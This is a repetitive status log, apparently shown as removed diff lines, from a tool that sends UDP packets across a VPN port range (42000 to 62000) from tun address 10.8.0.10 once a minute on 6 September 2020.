-~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 04:36:05 -Starting port fill at 2020-09-06 04:37:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 04:37:05 -Starting port fill at 2020-09-06 04:38:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 04:38:05 -Starting port fill at 2020-09-06 04:39:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 04:39:05 -Starting port fill at 2020-09-06 04:40:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 04:40:07 -Starting port fill at 2020-09-06 04:41:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 04:41:05 -Starting port fill at 2020-09-06 04:42:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 04:42:05 -Starting port fill at 2020-09-06 04:43:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 04:43:05 -Starting port fill at 2020-09-06 04:44:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 04:44:05 -Starting port fill at 2020-09-06 04:45:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 04:45:05 -Starting port fill at 2020-09-06 04:46:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 04:46:07 -Starting port fill at 2020-09-06 04:47:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 04:47:06 -Starting port fill at 2020-09-06 04:48:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 04:48:06 -Starting port fill at 2020-09-06 04:49:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 04:49:04 -Starting port fill at 2020-09-06 04:50:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 04:50:04 -Starting port fill at 2020-09-06 04:51:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 04:51:04 -Starting port fill at 2020-09-06 04:52:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 04:52:05 -Starting port fill at 2020-09-06 04:53:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 04:53:06 -Starting port fill at 2020-09-06 04:54:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 04:54:06 -Starting port fill at 2020-09-06 04:55:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 04:55:05 -Starting port fill at 2020-09-06 04:56:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 